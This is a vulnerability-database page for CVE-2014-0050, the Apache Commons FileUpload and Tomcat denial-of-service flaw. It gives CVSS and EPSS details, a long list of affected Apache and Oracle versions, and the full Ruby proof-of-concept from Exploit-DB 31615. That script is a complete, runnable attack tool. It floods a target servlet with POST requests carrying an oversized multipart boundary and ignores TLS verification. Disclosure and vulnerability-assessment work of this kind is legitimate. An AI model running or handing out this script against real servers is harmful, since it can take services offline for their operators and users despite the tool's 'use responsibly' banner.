Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 31615
Publication date : 2014-02-11 23h00 +00:00
Author : Trustwave's SpiderLabs
EDB Verified : Yes
#################################################################################
# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #
# #
# Author: Oren Hafif, Trustwave SpiderLabs Research #
# This is a Proof of Concept code that was created for the sole purpose #
# of assisting system administrators in evaluating whether their applications #
# are vulnerable to this issue or not #
# #
# Please use responsibly. #
#################################################################################
require 'net/http'
require 'net/https'
require 'optparse'
require 'openssl'
options = {}
opt_parser = OptionParser.new do |opt|
opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"
opt.separator ""
opt.separator "Options"
opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|
options[:url] = url
end
opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|
options[:number_of_requests] = number_of_requests
end
opt.on("-h","--help","help") do
puts ""
puts "#################################################################################"
puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"
puts "# #"
puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"
puts "# This is a Proof of Concept code that was created for the sole purpose #"
puts "# of assisting system administrators in evaluating whether or not #"
puts "# their applications are vulnerable to this issue. #"
puts "# #"
puts "# Please use responsibly. #"
puts "#################################################################################"
puts ""
puts opt_parser
puts ""
exit
end
end
opt_parser.parse!
uri = ""
begin
uri = URI.parse(options[:url])
rescue Exception => e
puts ""
puts "ERROR: Invalid URL was entered #{options[:url]}"
puts ""
puts opt_parser
exit
end
number_of_requests = 10;
if(options[:number_of_requests] != nil)
begin
number_of_requests = Integer( options[:number_of_requests] )
throw Exception.new if number_of_requests <= 0
rescue Exception => e
puts e
puts ""
puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"
puts ""
puts opt_parser
exit
end
end
#uri = URI.parse(uri)
puts ""
puts "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."
i=10
i.times { print "#{i.to_s}...";sleep 1; i-=1;}
puts ""
number_of_requests.times do
begin
puts "Request Launched"
https = Net::HTTP.new(uri.host,uri.port)
https.use_ssl = uri.scheme=="https"
https.verify_mode = OpenSSL::SSL::VERIFY_NONE
req = Net::HTTP::Post.new(uri.path)
req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")
req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")
req.body = "b"*4097
https.read_timeout = 1
res = https.request(req)
rescue Timeout::Error=>e
puts "Timeout - continuing DoS..."
rescue Exception=>e
puts e.inspect
end
end
Products Mentioned
Configuraton 0
Oracle>>Retail_applications >> Version 12.0
Oracle>>Retail_applications >> Version 12.0in
Oracle>>Retail_applications >> Version 13.0
Oracle>>Retail_applications >> Version 13.1
Oracle>>Retail_applications >> Version 13.2
Oracle>>Retail_applications >> Version 13.3
Oracle>>Retail_applications >> Version 13.4
Oracle>>Retail_applications >> Version 14.0
Configuraton 0
Apache>>Commons_fileupload >> Version To (including) 1.3
Apache>>Commons_fileupload >> Version 1.0
Apache>>Commons_fileupload >> Version 1.1
Apache>>Commons_fileupload >> Version 1.1.1
Apache>>Commons_fileupload >> Version 1.2
Apache>>Commons_fileupload >> Version 1.2.1
Apache>>Commons_fileupload >> Version 1.2.2
Apache>>Tomcat >> Version 7.0.0
Apache>>Tomcat >> Version 7.0.0
Apache>>Tomcat >> Version 7.0.1
Apache>>Tomcat >> Version 7.0.2
Apache>>Tomcat >> Version 7.0.2
Apache>>Tomcat >> Version 7.0.3
Apache>>Tomcat >> Version 7.0.4
Apache>>Tomcat >> Version 7.0.4
Apache>>Tomcat >> Version 7.0.5
Apache>>Tomcat >> Version 7.0.6
Apache>>Tomcat >> Version 7.0.7
Apache>>Tomcat >> Version 7.0.8
Apache>>Tomcat >> Version 7.0.9
Apache>>Tomcat >> Version 7.0.10
Apache>>Tomcat >> Version 7.0.11
Apache>>Tomcat >> Version 7.0.12
Apache>>Tomcat >> Version 7.0.13
Apache>>Tomcat >> Version 7.0.14
Apache>>Tomcat >> Version 7.0.15
Apache>>Tomcat >> Version 7.0.16
Apache>>Tomcat >> Version 7.0.17
Apache>>Tomcat >> Version 7.0.18
Apache>>Tomcat >> Version 7.0.19
Apache>>Tomcat >> Version 7.0.20
Apache>>Tomcat >> Version 7.0.21
Apache>>Tomcat >> Version 7.0.22
Apache>>Tomcat >> Version 7.0.23
Apache>>Tomcat >> Version 7.0.24
Apache>>Tomcat >> Version 7.0.25
Apache>>Tomcat >> Version 7.0.26
Apache>>Tomcat >> Version 7.0.27
Apache>>Tomcat >> Version 7.0.28
Apache>>Tomcat >> Version 7.0.29
Apache>>Tomcat >> Version 7.0.30
Apache>>Tomcat >> Version 7.0.31
Apache>>Tomcat >> Version 7.0.32
Apache>>Tomcat >> Version 7.0.33
Apache>>Tomcat >> Version 7.0.34
Apache>>Tomcat >> Version 7.0.35
Apache>>Tomcat >> Version 7.0.36
Apache>>Tomcat >> Version 7.0.37
Apache>>Tomcat >> Version 7.0.38
Apache>>Tomcat >> Version 7.0.39
Apache>>Tomcat >> Version 7.0.40
Apache>>Tomcat >> Version 7.0.41
Apache>>Tomcat >> Version 7.0.42
Apache>>Tomcat >> Version 7.0.43
Apache>>Tomcat >> Version 7.0.44
Apache>>Tomcat >> Version 7.0.45
Apache>>Tomcat >> Version 7.0.46
Apache>>Tomcat >> Version 7.0.47
Apache>>Tomcat >> Version 7.0.48
Apache>>Tomcat >> Version 7.0.49
Apache>>Tomcat >> Version 7.0.50
Apache>>Tomcat >> Version 8.0.0
Apache>>Tomcat >> Version 8.0.0
Apache>>Tomcat >> Version 8.0.0
Apache>>Tomcat >> Version 8.0.0
Apache>>Tomcat >> Version 8.0.1
References